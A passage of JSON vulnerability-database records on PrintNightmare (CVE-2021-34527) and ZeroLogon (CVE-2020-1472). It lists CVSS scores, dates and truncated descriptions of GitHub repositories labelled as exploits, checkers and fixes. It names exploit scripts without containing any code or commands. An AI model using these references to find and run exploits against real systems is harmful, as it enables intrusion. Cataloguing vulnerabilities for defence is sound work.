"bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-15T19:55:08", "id": "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-08-16T05:58:39", "description": "Windows Print Spooler Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T22:15:00", "type": "prion", "title": "CVE-2021-34527", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-02T21:08:00", "id": "PRION:CVE-2021-34527", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34527", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2021-12-10T15:22:34", "description": "# Fix-CVE-2021-34527\nFix for the securit...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T14:25:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-03T09:03:00", "id": "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:29:26", "description": "# PrintNightmare CVE-2021-34527\n\nBy now you most probably alread...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T07:58:53", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:16:25", "id": "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:19", "description": "# PowerShell-PrintNightmare\nA collection of scripts to help set ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T21:28:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-11T16:21:00", "id": "98CA9A39-577D-51F2-B8B9-B20E80D94173", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:32", "description": "# CVE-2021-34527-PrintNightmare-Workaround\n\nThis simple PowerShe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T17:50:56", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:32", "id": "BDFBDA81-0DEB-5523-B538-F23C3B524986", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-20T20:54:50", "description": "# CVE-2021-34527 PrintNightmare PoC \ud83d\udc7e\n\n## \ud83d\udcdd Description\nThis sim...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-08-20T12:04:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-08-20T12:06:06", "id": "F796D11D-F85B-5218-BBFA-9BDBAE5B6A59", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:48", "description": "# Disable-Spooler-Service-PrintNightmare-CVE-2021-34527\nSimple ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-07T06:41:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T06:47:16", "id": "8542D571-7253-5609-BC52-CBCB5F40929A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:24", "description": "# Printnightmare\nFix for PrintNightmare CVE-2021-34527\n\n![Printn...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T09:22:03", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T11:02:54", "id": "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-06T11:53:20", "description": "# PsFix-CVE-2021-34527\nFix-CVE-2021-34527\nFi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-07T20:14:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T20:18:26", "id": "26B4C125-95CE-54A5-82FB-2D1C219A09CB", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:16:59", "description": "# disable-RegisterSpoolerRemoteRpcEndPoint\nWorkaround for Window...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T16:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T21:11:43", "id": "E235B3DF-990F-5508-9496-90462B45125D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:56", "description": "PrintNightmare CVE-2021-34527 powershell PowerShell workaround t...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T20:02:50", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T13:34:12", "id": "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:55:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T01:32:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T03:54:14", "id": "1E42289A-77F8-55A2-B85E-83CAA00CE951", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T12:23:19", "description": "# Introduction\nPrintNightmare-Patcher, a simple tool that resolv...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T14:14:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:08", "id": "D089579B-4420-5AD5-999F-45063D972E66", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:22:28", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-13T10:04:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-12-13T10:21:38", "id": "3DC96731-93EE-5FF0-9AC3-C472059DC1AF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-25T22:03:53", "description": "# CVE-2021-34527\n\nCVE-2021-34527 LPE exploit using AddPrinterDri...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-05T23:48:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-08-25T17:42:32", "id": "436B5B97-EF58-5F05-B611-815DDEF67B8A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:08:34", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-21T09:42:34", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-01-30T02:59:52", "id": "20466D13-6C5B-5326-9C8B-160E9BE37195", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:07:17", "description": "# CVE-2020-1472\nChecker & Exploit Code for CVE-2020-1472 aka **Z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T13:50:01", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-20T18:17:37", "id": "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:39:46", "description": "# zerologon\nCheck for events that indicate non compatible device...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-15T15:02:53", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-11T09:28:46", "id": "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:21:44", "description": "# ZeroLogon exploitation script\n\nExploit code based on https://w...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T19:19:07", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-15T15:41:40", "id": "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:54:58", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-22T18:51:09", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in 